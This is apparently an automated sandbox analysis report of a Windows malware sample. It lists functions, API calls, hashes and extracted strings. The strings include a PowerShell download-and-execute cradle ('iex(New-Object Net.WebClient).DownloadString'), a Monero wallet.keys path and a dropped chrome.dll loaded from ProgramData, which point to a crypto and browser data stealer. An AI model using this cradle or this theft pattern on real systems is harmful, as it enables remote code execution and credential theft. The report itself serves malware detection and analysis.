                                      • Instruction Fuzzy Hash: 6F4128B011078C5EDB318B248D84FFB7BF8AB45714F5444EAEA8B97282E2719B44DF20
                                      Function 00AD49D0 Relevance: 8.9, APIs: 7, Instructions: 101stringCOMMON
                                      Download Yara Rule
                                      APIs
                                      • lstrcat.KERNEL32(?,0154F380), ref: 00AD4A2B
                                        • Part of subcall function 00AD8F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00AD8F9B
                                      • lstrcat.KERNEL32(?,00000000), ref: 00AD4A51
                                      • lstrcat.KERNEL32(?,?), ref: 00AD4A70
                                      • lstrcat.KERNEL32(?,?), ref: 00AD4A84
                                      • lstrcat.KERNEL32(?,0153A8D8), ref: 00AD4A97
                                      • lstrcat.KERNEL32(?,?), ref: 00AD4AAB
                                      • lstrcat.KERNEL32(?,0154E1E8), ref: 00AD4ABF
                                        • Part of subcall function 00ADAA50: lstrcpy.KERNEL32(00AE0E1A,00000000), ref: 00ADAA98
                                        • Part of subcall function 00AD8F20: GetFileAttributesA.KERNEL32(00000000,?,00AC1B94,?,?,00AE577C,?,?,00AE0E22), ref: 00AD8F2F
                                        • Part of subcall function 00AD47C0: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00AD47D0
                                        • Part of subcall function 00AD47C0: RtlAllocateHeap.NTDLL(00000000), ref: 00AD47D7
                                        • Part of subcall function 00AD47C0: wsprintfA.USER32 ref: 00AD47F6
                                        • Part of subcall function 00AD47C0: FindFirstFileA.KERNEL32(?,?), ref: 00AD480D
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      • Associated: 00000000.00000002.2159046467.0000000000AC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000BFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000F25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000102E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001036000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001044000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2161305989.0000000001045000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164369907.00000000011DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164400168.00000000011E0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                                      • String ID:
                                      • API String ID: 2540262943-0
                                      • Opcode ID: 5e5ae638f181e607dc438ad257e9be690fcb3bf15e7907a6df4587a49b336a2d
                                      • Instruction ID: c7d60296d842f45d0947a310d392662c4e52aa0448c01f9488ddc2f7a8197a45
                                      • Opcode Fuzzy Hash: 5e5ae638f181e607dc438ad257e9be690fcb3bf15e7907a6df4587a49b336a2d
                                      • Instruction Fuzzy Hash: 303160B291021867CB14FBB0DD85FDD733CAB58700F40458BB24696251EE74E7C8CBA8
                                      Function 00AD2EE0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 99COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00ADAA50: lstrcpy.KERNEL32(00AE0E1A,00000000), ref: 00ADAA98
                                        • Part of subcall function 00ADACC0: lstrlen.KERNEL32(?,01548C58,?,\Monero\wallet.keys,00AE0E1A), ref: 00ADACD5
                                        • Part of subcall function 00ADACC0: lstrcpy.KERNEL32(00000000), ref: 00ADAD14
                                        • Part of subcall function 00ADACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00ADAD22
                                        • Part of subcall function 00ADAC30: lstrcpy.KERNEL32(00000000,?), ref: 00ADAC82
                                        • Part of subcall function 00ADAC30: lstrcat.KERNEL32(00000000), ref: 00ADAC92
                                        • Part of subcall function 00ADABB0: lstrcpy.KERNEL32(?,00AE0E1A), ref: 00ADAC15
                                      • ShellExecuteEx.SHELL32(0000003C), ref: 00AD2FD5
                                      Strings
                                      • ')", xrefs: 00AD2F03
                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00AD2F54
                                      • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00AD2F14
                                      • <, xrefs: 00AD2F89
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      • Associated: 00000000.00000002.2159046467.0000000000AC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000BFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000F25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000102E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001036000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001044000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2161305989.0000000001045000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164369907.00000000011DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164400168.00000000011E0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                                      • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      • API String ID: 3031569214-898575020
                                      • Opcode ID: ce27a64999837dd97a0428cb6cda12c512eb63ba67a180f40b513a6eb98ba69e
                                      • Instruction ID: 790e73ce84c00467fe2a066c85f18de1370d5abf8cd82f38c7bf2afaefc1c46c
                                      • Opcode Fuzzy Hash: ce27a64999837dd97a0428cb6cda12c512eb63ba67a180f40b513a6eb98ba69e
                                      • Instruction Fuzzy Hash: A341DD719102089BDB14EFA0C9A2FEDBB79AF24300F40455BE05766296EF746A4ACF91
                                      Function 00B3CBE2 Relevance: 7.6, APIs: 5, Instructions: 87COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      • Associated: 00000000.00000002.2159046467.0000000000AC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000BFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000F25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000102E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001036000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001044000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2161305989.0000000001045000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164369907.00000000011DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164400168.00000000011E0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: dllmain_raw$dllmain_crt_dispatch
                                      • String ID:
                                      • API String ID: 3136044242-0
                                      • Opcode ID: 234a4587e1df5c0bc1ce5882952f099010f88dbe2dfa5d5717c242a90a4fec11
                                      • Instruction ID: 33fbaf84c2cbb6d18e6f8bd2a846eca8d177dcb292c15ecdb2cbd530fc27f9e9
                                      • Opcode Fuzzy Hash: 234a4587e1df5c0bc1ce5882952f099010f88dbe2dfa5d5717c242a90a4fec11
                                      • Instruction Fuzzy Hash: 47218172D40628ABDB229EA9CC45AAF7EF9EB81790FA55195F80D77211D3308D418BE0
                                      Function 00AD7F90 Relevance: 7.6, APIs: 5, Instructions: 58registrymemoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00AD7FC7
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00AD7FCE
                                      • RegOpenKeyExA.ADVAPI32(80000002,0153B7D0,00000000,00020119,?), ref: 00AD7FEE
                                      • RegQueryValueExA.ADVAPI32(?,0154E168,00000000,00000000,000000FF,000000FF), ref: 00AD800F
                                      • RegCloseKey.ADVAPI32(?), ref: 00AD8022
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      • Associated: 00000000.00000002.2159046467.0000000000AC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000BFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000F25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000102E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001036000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001044000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2161305989.0000000001045000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164369907.00000000011DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164400168.00000000011E0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                      • String ID:
                                      • API String ID: 3225020163-0
                                      • Opcode ID: e9975ea01562adc392dce19ba171250c66d538d3ab2fc2cb89958d4ce5437469
                                      • Instruction ID: 0d6ef9a087eeee37de136b59db8cf84887cd06a8010e9972e7194d52e97fcec4
                                      • Opcode Fuzzy Hash: e9975ea01562adc392dce19ba171250c66d538d3ab2fc2cb89958d4ce5437469
                                      • Instruction Fuzzy Hash: B2114CB1A54309ABD704CB94DD45FABBBB8FB44B10F10421AF616E7380DBB959008BA1
                                      Function 00AD93F0 Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 41stringCOMMON
                                      Download Yara Rule
                                      APIs
                                      • StrStrA.SHLWAPI(0154F4B8,00000000,00000000,?,00AC9F71,00000000,0154F4B8,00000000), ref: 00AD93FC
                                      • lstrcpyn.KERNEL32(00D97580,0154F4B8,0154F4B8,?,00AC9F71,00000000,0154F4B8), ref: 00AD9420
                                      • lstrlen.KERNEL32(00000000,?,00AC9F71,00000000,0154F4B8), ref: 00AD9437
                                      • wsprintfA.USER32 ref: 00AD9457
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      • Associated: 00000000.00000002.2159046467.0000000000AC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000BFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000F25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000102E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001036000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001044000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2161305989.0000000001045000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164369907.00000000011DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164400168.00000000011E0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpynlstrlenwsprintf
                                      • String ID: %s%s
                                      • API String ID: 1206339513-3252725368
                                      • Opcode ID: 498b8b7bcdedb645ae5b2874eaba9070d1e4f45e96b1fc1a85b58e5432d3aa29
                                      • Instruction ID: 9fcb9c5a1096cb6ada5cd4ed91e4ea8cb91b4f88f41bff75a771eb5248b634e8
                                      • Opcode Fuzzy Hash: 498b8b7bcdedb645ae5b2874eaba9070d1e4f45e96b1fc1a85b58e5432d3aa29
                                      • Instruction Fuzzy Hash: 3901C875614208FFCB44DFA8C948EEE7BB8EB48304F108649F9099B345D631EA44DBA4
                                      Function 00AC12A0 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00AC12B4
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00AC12BB
                                      • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00AC12D7
                                      • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00AC12F5
                                      • RegCloseKey.ADVAPI32(?), ref: 00AC12FF
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      • Associated: 00000000.00000002.2159046467.0000000000AC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000BFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000F25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000102E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001036000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001044000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2161305989.0000000001045000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164369907.00000000011DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164400168.00000000011E0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                      • String ID:
                                      • API String ID: 3225020163-0
                                      • Opcode ID: 5ec944214b287789f7d90642c8d8d4f8d6706539868c632e70e1d4d0d3258a71
                                      • Instruction ID: b9fe2c5c707d6c96cf03becad84cbbc2e0c79e3c66d30fcf0c5f555d57b99de1
                                      • Opcode Fuzzy Hash: 5ec944214b287789f7d90642c8d8d4f8d6706539868c632e70e1d4d0d3258a71
                                      • Instruction Fuzzy Hash: C101CD79A54309BBDB04DFD4DC49FAE7778AB48701F10419AFA05E7290D6709A008BA4
                                      Function 00AD68D0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00AD6903
                                        • Part of subcall function 00ADAA50: lstrcpy.KERNEL32(00AE0E1A,00000000), ref: 00ADAA98
                                        • Part of subcall function 00ADACC0: lstrlen.KERNEL32(?,01548C58,?,\Monero\wallet.keys,00AE0E1A), ref: 00ADACD5
                                        • Part of subcall function 00ADACC0: lstrcpy.KERNEL32(00000000), ref: 00ADAD14
                                        • Part of subcall function 00ADACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00ADAD22
                                        • Part of subcall function 00ADABB0: lstrcpy.KERNEL32(?,00AE0E1A), ref: 00ADAC15
                                      • ShellExecuteEx.SHELL32(0000003C), ref: 00AD69C6
                                      • ExitProcess.KERNEL32 ref: 00AD69F5
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      • Associated: 00000000.00000002.2159046467.0000000000AC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000BFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000F25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000102E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001036000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001044000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2161305989.0000000001045000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164369907.00000000011DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164400168.00000000011E0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                                      • String ID: <
                                      • API String ID: 1148417306-4251816714
                                      • Opcode ID: 202a52228949ad038e4e2d1b1509b45a498c1c76a885cdc5fae5338c4bf0cc5e
                                      • Instruction ID: 156c54e7db35f280e997c63cdd83f57c2731646685445c499dbcbedd59a8b921
                                      • Opcode Fuzzy Hash: 202a52228949ad038e4e2d1b1509b45a498c1c76a885cdc5fae5338c4bf0cc5e
                                      • Instruction Fuzzy Hash: F7312FB1911218ABDB14EB90DE95FDDB778AF14300F40418BF206B6291DF746B48CF69
                                      Function 00AD8950 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00AE0E10,00000000,?), ref: 00AD89BF
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00AD89C6
                                      • wsprintfA.USER32 ref: 00AD89E0
                                        • Part of subcall function 00ADAA50: lstrcpy.KERNEL32(00AE0E1A,00000000), ref: 00ADAA98
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      • Associated: 00000000.00000002.2159046467.0000000000AC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000BFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000F25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000102E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001036000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001044000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2161305989.0000000001045000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164369907.00000000011DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164400168.00000000011E0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateProcesslstrcpywsprintf
                                      • String ID: %dx%d
                                      • API String ID: 1695172769-2206825331
                                      • Opcode ID: d08c3f630248e9e261c7ffdaed53d578e19d1f5be8893a98247165e93e571158
                                      • Instruction ID: 913c4222ab1a8aedfb4b0082b44f695ebeb1471cb3fc2b2120c0ef774094ddb8
                                      • Opcode Fuzzy Hash: d08c3f630248e9e261c7ffdaed53d578e19d1f5be8893a98247165e93e571158
                                      • Instruction Fuzzy Hash: 052108B1A54304AFDB00DF94DD45FAEBBB8FB48B10F10465AFA16E7390C775A9008BA4
                                      Function 00ACA090 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 34libraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • LoadLibraryA.KERNEL32(C:\ProgramData\chrome.dll), ref: 00ACA098
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      • Associated: 00000000.00000002.2159046467.0000000000AC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000BFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000F25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000102E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001036000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001044000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2161305989.0000000001045000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164369907.00000000011DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164400168.00000000011E0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: LibraryLoad
                                      • String ID: C:\ProgramData\chrome.dll$connect_to_websocket$free_result
                                      • API String ID: 1029625771-1545816527
                                      • Opcode ID: 0262aa93ed377be46639a8d2ab13d88821a6436f954307dd1cf38b889b2767d3
                                      • Instruction ID: 689639df4dda9bbbdf55931a1b2a614b424eb60848fe47a8a0d81f81810b7249
                                      • Opcode Fuzzy Hash: 0262aa93ed377be46639a8d2ab13d88821a6436f954307dd1cf38b889b2767d3
                                      • Instruction Fuzzy Hash: 2AF01774AAC308EFD714ABA0EC4DB663374A319354F84092AE50DD73A0D7B49884CB76
                                      Function 00AD8EE0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00AD96AE,00000000), ref: 00AD8EEB
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00AD8EF2
                                      • wsprintfW.USER32 ref: 00AD8F08
                                      Strings
                                      Memory Dump Source
